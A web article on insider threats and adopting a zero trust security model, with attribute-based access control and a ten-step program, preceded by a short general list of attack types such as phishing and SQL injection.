There are several methods which hackers can use to bring the Internet down:

  • Malware – These are various forms of malicious software that can be installed to harm a computer and its owner. Hackers use them for hacking, controlling, and monitoring everything that goes on in the computer.
  • Phishing – The attackers use malicious attachments and links that users typically consider legitimate and when they click a link or an attachment, they expose their computers to dangerous programs and harm.
  • SQL injection attack – It’s a Structured Query Language used in the program database. The hackers use it by exploiting vulnerable SQL, allowing the server to run the malicious codes. Using the code, they can access account usernames and passcodes.
  • Cross-site scripting – This involves injecting malicious code into a website. The hackers use this to access information on the website, which they can also change to whatever they want.
Identity and access management certifications

No matter how the Internet is disrupted, such interruptions can be significant in terms of financial cost and human life. They can inflict enormous blow to both individuals and businesses. Governments and organizations must work together to mitigate the risks of Internet shutdown by preventing attacks as well as detecting, and responding to incidents quickly.

An insider refers to employees and others who have been granted system access to perform certain tasks. The definition of insider expands to non-employees such as consultants, customers, vendors and third parties who equally have an established identity within the organization and access to various systems.

10 Steps to Build an
Insider Threat Management Program with a Zero Trust Model

What is Insider Threat?

Insiders have certain access to systems to perform tasks related to their job duties. The combination of all the information they possess can ultimately pose insider threats to organizations and inflict damage upon the organization whether the insider action is intentional or malicious, or is caused by an error, accident and negligence which can also lead to the compromise of their access credentials through various hacking methods. Insider threats include identity theft and fraud, theft of intellectual property, as well as reduced data integrity and system availability.

One way organizations can mitigate insider threats is through the Zero Trust model which stresses the importance of not blindly trusting anyone who makes an attempt to access a system or initiate a transaction even those individuals who have already been granted access privileges.

Brief History of Zero Trust

The concept of a zero trust policy was first introduced in 2010 by an expert in Forrester Research. The concept took some time to be accepted across industries and Google was among the first ones to announce that they had adopted a zero trust policy. After Google adopted it, the concept as an acceptable IT security model took off and was adopted by many organizations.

How Does It Work?

A zero-trust architecture is a threat management model that does not assume people and systems operating within the network are entitled to all their privileges without repeated verification.

In a traditional castle-and-moat setup of an IT infrastructure, the model makes it hard for anyone outside of the organization to get access to the private resources, however, ignores the security risks posed by insiders. In fact, there are countless number of cases of employees who either wittingly or unwittingly caused a confidential data leak that led to millions of dollars in damages.

Verification Required for Everyone

A zero trust policy requires verification of everyone whether they’re an employee or someone from the outside. Everyone needs to be verified before accessing private resources. No one is trusted by default with the zero trust model whether inside or outside the network. Many cybersecurity experts believe that this simple extra layer of security can prevent data breaches.

Consequences of a Data Breach

A study by IBM revealed that a single data breach can cost a company over $3 million. The loss of personal customer data in a data breach case can have many consequences including damage to business reputation. Many affected customers will choose to do business elsewhere, which means lower revenue. Because of the harrowing insider threat statistics and consequences raised by industry experts and research reports, many organizations have chosen to rightfully adopt a zero trust policy to counter insider threats.

How Should an Organization Adopt a Zero Trust Policy

It is recommended to adopt and slowly implement a zero-trust policy to minimize risks. First, you should analyze the risks that your organization faces. You define the scope, create a zero trust implementation plan, and consider your resources, priorities and timelines. You can decide to use internal resources or hire experts to help you with your project.

Next, you implement an authentication protocol to secure your systems and most sensitive assets by controlling identities and their access. You want to protect all your assets using multi-factor authentication and layered access authorization model so that no one has unrestricted access to all systems and data once they are inside. This protects your organization from total ruin because of one unscrupulous employee.

Basically, you will deploy approval and authentication processes before you allow anyone onto the network or make transactions. This protects you from expensive data breaches that could bring down your company. One major danger of insider threats is that hackers could gain access to a privileged account to execute their schemes. This is why it is absolutely necessary to manage privileged accounts carefully.

Monitoring with Zero Trust Model

Once you have determined the scope, selected technology, and implemented processes to enforce a zero trust framework, you need to establish a monitoring process to look for malicious activity on the network. Once a suspicious activity is detected, it must be flagged and resolved. Monitoring insider privileged access which may have also been compromised by outsiders can pay off if the process is performed diligently.

Finally, you will implement a granular attribute-based access control model. ABAC is an access control model which is considered the next generation model in access management evolving from the role-based access control model. ABAC is based on establishing a set of attributes such as:

  • subject or user characteristics such as department, position, and IP address,
  • object or system and data characteristics such as sensitivity level, and
  • environmental characteristics such as time of day and location.

The main idea is to define which combination of characteristics or attributes will be used to control access from a central policy standpoint. The attributes may be different for each system.

In general, the key to having an effective zero trust policy is to scrutinize all activities in order to identify and block as many unauthorized activities, specially high risk transactions initiated by privileged accounts holders.

Continuous Verification Across Each Device

The zero trust framework in practical terms uses five key areas to build upon which are:

  • User trust
  • Device trust
  • Transport/session trust
  • Data trust
  • Application trust

For a zero trust program to be effective, implement verification across all five pillars to improve your security through a step by step process which includes scoping, technology, and processes. The project can start small and grow as you continue to assess your risks. To be successful, you will want to implement it in such a way that it provides the maximum level of security while having a minimal impact on the operations. You can lower the risk of a data breach and unauthorized access or transaction through insider security threats handling and management.

10 Steps to Build a Zero Trust Program

Consider the following steps for creating and implementing a zero trust security program:

  1. Complete a risk assessment
  2. Define your scope – systems, data, people, devices
  3. Create a business plan and promote the idea to the organization
  4. Establish your budget and resources
  5. Develop a zero trust implementation plan
  6. Define trust criteria and boundaries
  7. Deploy multi-step and multi-factor authentication technology
  8. Pay attention to privileged accounts on key applications, databases and devices
  9. Implement an appropriate access control model such as attribute-based model
  10. Monitor access and activities across your systems based on your trust criteria

Conclusion

A zero trust model scrutinized every person or device requesting access to systems and resources whether the requestor is an insider or outsider. Ultimately, the goal behind zero trust is to address the weakest link in security, which is the people (and devices) who are trusted entities and have access. While insiders provide an invaluable service, their established access can pose a great security risk to the organization which must be continuously verified, validated, and approved to protect your company and most valuable assets from potential insider threats.

Identity and access management certifications